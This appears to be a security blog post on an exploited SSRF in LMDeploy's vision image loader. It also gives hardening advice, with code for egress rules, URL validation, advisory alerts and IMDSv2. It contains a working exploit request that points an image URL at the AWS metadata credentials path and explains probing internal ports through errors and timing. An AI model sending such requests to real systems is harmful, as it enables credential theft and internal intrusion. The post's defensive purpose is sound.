An LMDeploy SSRF Was Exploited 12 Hours After the Advisory — With No Public PoC
On April 21 GitHub published the advisory for CVE-2026-33626, a server-side request forgery in LMDeploy's load_image() function in the vision-language path. By 03:35 UTC on April 22, roughly 12 hours later, a Sysdig honeypot caught the first exploitation attempt.
The attacker came in from Hong Kong, spent eight minutes inside the system, and used the vision image loader as a generic HTTP SSRF primitive. They probed the AWS instance metadata service at 169.254.169.254, Redis on 6379, MySQL on 3306, and an internal admin panel on 8080. There was no public proof-of-concept anywhere on GitHub or on paste sites. The advisory text alone, "fetches arbitrary URLs without validating internal/private IP addresses," was enough.
If you're a solo operator who's been running a self-hosted LLM server inside your VPC because "it's behind a firewall, who would attack it" — that calculation just expired.
The exact primitive
The bug is straightforward. LMDeploy's vision-language pipeline accepts image URLs and fetches them server-side via load_image(). The function uses a standard HTTP client. It does not validate that the URL points to an external IP. It will happily fetch from 169.254.169.254, 127.0.0.1, 10.0.0.0/8, or any internal address you can name.
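To make "does not validate" concrete, here is a minimal sketch of the vulnerable shape. This is illustrative, not LMDeploy's actual source; the point is that the user-supplied URL is fetched exactly as given.

```python
import requests

def load_image(image_url: str) -> bytes:
    # No scheme restriction, no resolution check, no private-IP filter:
    # "http://169.254.169.254/..." is fetched the same way a CDN URL is.
    resp = requests.get(image_url, timeout=10)
    resp.raise_for_status()
    return resp.content
```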
Stack that against a realistic 2026 deployment: LMDeploy runs inside a VPC on EC2, the instance carries an IAM role for pulling model weights from S3, and Redis and MySQL sit on default ports because "they're internal." The attacker sends a vision request with an image URL pointing at AWS IMDS, pulls the IAM credentials, and uses them to hit S3 directly. Or they probe the VPC for Redis and MySQL and exfiltrate whatever's there.
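The exploiting request plausibly looks like the sketch below, assuming the OpenAI-compatible /v1/chat/completions endpoint that LMDeploy's api_server exposes; the host, port, and model name are placeholders. Even when the fetched bytes never reach the attacker as text (they fail image decoding), differences in error messages and latency are enough to tell open ports from closed ones, which is all the port scanning described above requires.

```python
import requests

payload = {
    "model": "some-vlm",  # placeholder model name
    "messages": [{
        "role": "user",
        "content": [
            {"type": "text", "text": "describe this image"},
            {"type": "image_url", "image_url": {
                # IMDSv1 path listing the instance's IAM role credentials.
                # The model server, not the attacker, makes this request.
                "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
            }},
        ],
    }],
}
resp = requests.post(
    "http://model-server.internal:23333/v1/chat/completions",  # placeholder host/port
    json=payload,
    timeout=30,
)
# Status code, error body, and response time all leak reachability info.
print(resp.status_code, resp.text[:200])
```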
The patch path: pin to the fixed LMDeploy release, add egress filtering on the model server, drop the vision-language image loader entirely if you don't use it. None of those are defaults. All of them require knowing the bug exists.
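For reference, the validation a fix has to perform looks roughly like the sketch below (an illustration, not the actual patch): resolve the hostname first, then refuse anything private, loopback, or link-local. Even this has a time-of-check gap, since a DNS name can re-resolve to an internal address between the check and the fetch (DNS rebinding), which is why network-level egress filtering still matters on a patched build.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_external_url(url: str) -> bool:
    """Allow only http(s) URLs whose every resolved address is public."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    # Check every address the name resolves to, not just the first one.
    for _family, _, _, _, sockaddr in infos:
        ip_text = sockaddr[0].split("%")[0]  # drop IPv6 scope id if present
        addr = ipaddress.ip_address(ip_text)
        if (addr.is_private or addr.is_loopback
                or addr.is_link_local or addr.is_reserved):
            return False
    return True
```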
The pattern, named
LLM serving stacks are 2026's new attack surface category. They speak HTTP from inside trust boundaries. They take URLs as inputs — image loaders, RAG fetchers, tool callbacks. They're maintained by 1–3 people on Discord. The "supply chain" risk isn't just npm anymore. It's the YC-stage open-source LLM server you pip install'd six months ago and never updated.
LMDeploy is not the first and won't be the last. vLLM, Ollama, llama.cpp's HTTP server mode, Text Generation Inference: all the same shape. All speak HTTP, all run inside trust boundaries, and all are maintained by small teams under heavy growth pressure, where security defaults land wherever the README left them. The time from popularity to CVE is collapsing.
Why this is structurally a solo-operator problem
A Fortune 500 has a security team paging on CVEs the same day they publish. A solo dev sees the advisory three weeks later in a newsletter, by which point they've been scanned 50 times. The compensating control isn't "be faster at patching." It's network design. Solo operators systematically over-trust their own VPC.
This is a real failure mode. The instinct is "it's behind a firewall; the firewall is the security boundary." The reality is that an SSRF doesn't need to punch through the firewall, because it starts on the trusted side of it: the requests originate from a host the perimeter already trusts, so the perimeter never sees an attack. Defense in depth is the only defense; a perimeter alone is not one.
The 30-minute hardening pass
Four moves, in order.
Put the model server in its own VPC with an explicit egress allowlist. No RFC 1918 space (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), no link-local space (169.254.0.0/16; IMDS itself is covered in move four), only the public endpoints you actually use. If your model needs to fetch images, allowlist the specific image hosts. If it doesn't, block egress to the internet entirely.
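A sketch of the per-instance version of that allowlist using boto3; the security group ID and CIDR are placeholders, and for VPC-wide enforcement you'd reach for network ACLs or an egress proxy instead. Security groups don't filter link-local traffic such as IMDS, which is exactly why move four exists.

```python
import boto3

ec2 = boto3.client("ec2")
SG_ID = "sg-0123456789abcdef0"  # placeholder: the model server's security group

# Remove the default allow-all egress rule...
ec2.revoke_security_group_egress(
    GroupId=SG_ID,
    IpPermissions=[{"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}],
)

# ...then allow HTTPS out only to the image hosts the model actually uses.
ec2.authorize_security_group_egress(
    GroupId=SG_ID,
    IpPermissions=[{
        "IpProtocol": "tcp",
        "FromPort": 443,
        "ToPort": 443,
        "IpRanges": [{
            "CidrIp": "203.0.113.0/24",  # placeholder CDN range
            "Description": "image CDN allowlist",
        }],
    }],
)
```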
Audit which features you actually use vs. what ships. LMDeploy's vision pipeline is opt-in for most workloads. If you're running text-only inference, load_image() should not be reachable. Read the config. Disable what you don't need.
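A one-minute way to verify, assuming your deployment exposes the OpenAI-compatible chat endpoint: send it an image_url part and confirm the server rejects it outright. The port, model name, and probe URL are placeholders.

```python
import requests

payload = {
    "model": "your-model",  # placeholder
    "messages": [{
        "role": "user",
        "content": [{
            "type": "image_url",
            "image_url": {"url": "http://203.0.113.1/probe.png"},  # inert probe
        }],
    }],
}
r = requests.post("http://localhost:23333/v1/chat/completions",
                  json=payload, timeout=15)
# A text-only deployment should return a clean 4xx here. Anything that
# suggests the server attempted the fetch means load_image() is reachable.
print(r.status_code, r.text[:300])
```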
Subscribe to advisories. Add the repos for every model-serving stack you run to a GitHub Security Advisory subscription. Pipe them to a Discord or Slack you actually read. The 12-hour window from advisory to exploit is the hard constraint here; you cannot beat it without automation.
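A minimal poller, assuming GitHub's global security advisories endpoint and a Slack incoming webhook; the package list and webhook URL are yours to adapt, and in real use you'd persist `seen` to disk and run this from cron.

```python
import requests

PACKAGES = "lmdeploy,vllm"  # packages you actually run
WEBHOOK = "https://hooks.slack.com/services/XXX/YYY/ZZZ"  # placeholder
seen: set[str] = set()  # persist between runs in real use

def poll() -> None:
    r = requests.get(
        "https://api.github.com/advisories",
        params={"ecosystem": "pip", "affects": PACKAGES, "per_page": 20},
        headers={"Accept": "application/vnd.github+json"},
        timeout=30,
    )
    r.raise_for_status()
    for adv in r.json():
        if adv["ghsa_id"] in seen:
            continue
        seen.add(adv["ghsa_id"])
        text = f"{adv['ghsa_id']} ({adv.get('cve_id')}): {adv['summary']}"
        requests.post(WEBHOOK, json={"text": text}, timeout=30)

if __name__ == "__main__":
    poll()
```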
Move secrets off the box. No env-var IAM keys on the model server. Enforce IMDSv2 with a hop limit of 1. Requiring the v2 session token would by itself have blunted this specific attack: a URL-fetching SSRF can issue GETs but not the PUT needed to obtain a token. The hop limit of 1 adds a second layer by keeping the token response from crossing a network hop, such as a container bridge on the EC2 host. Move long-lived credentials into a secrets manager and fetch them on startup.
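Enforcing that on a running instance is one call (the instance ID is a placeholder; `aws ec2 modify-instance-metadata-options` is the CLI equivalent):

```python
import boto3

ec2 = boto3.client("ec2")
ec2.modify_instance_metadata_options(
    InstanceId="i-0123456789abcdef0",  # placeholder
    HttpTokens="required",             # IMDSv2 only: a plain GET returns nothing
    HttpPutResponseHopLimit=1,         # token response can't cross a network hop
)
```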
The honest counter-take
Most solo devs are not running self-hosted inference for production traffic. They're using API-hosted models — Anthropic, OpenAI, DeepSeek, Google. If you're on a hosted API, this CVE is genuinely not your problem. The blast radius is zero.
But if you've been considering self-hosting "to save money," add the security operational tax to your build-vs-buy spreadsheet. The cost of running LMDeploy safely in 2026 is closer to $50/month of CloudWatch + Snyk + on-call attention than the $0 the README implies. The 12-hour exploitation window from this incident is the price tag on that operational tax.
For a solo operator at sub-$10K MRR, the math points clearly toward hosted APIs. Self-hosted inference made sense in 2024 when the price gap was 10× and the security threat model was speculative. In 2026 the price gap is closer to 3×, the threat model is "you have ~12 hours from advisory to scan," and the right answer for most one-person shops is to keep using hosted APIs and stop viewing self-hosting as the obvious cost win.
The bigger picture
LMDeploy on April 21. Bitwarden npm targeting MCP configs on April 22. LeRobot pickle deserialization disclosed April 28. Three structurally different AI-infrastructure security wedges in eight days. Different attack surfaces, different defensive postures required, same underlying reality: the AI infrastructure layer is being shipped fast under heavy growth pressure, security defaults are wherever the README ended up, and the time from "popular project" to "CVE in the wild" is shrinking.
The right reaction isn't panic. The right reaction is the audit. Open every AI-adjacent dependency, identify what attack surface it exposes, and decide whether you're paying the operational tax to run it safely or whether you should be paying someone else to run it for you.
For LMDeploy specifically, the answer is probably the latter. For most of your stack, it might be too.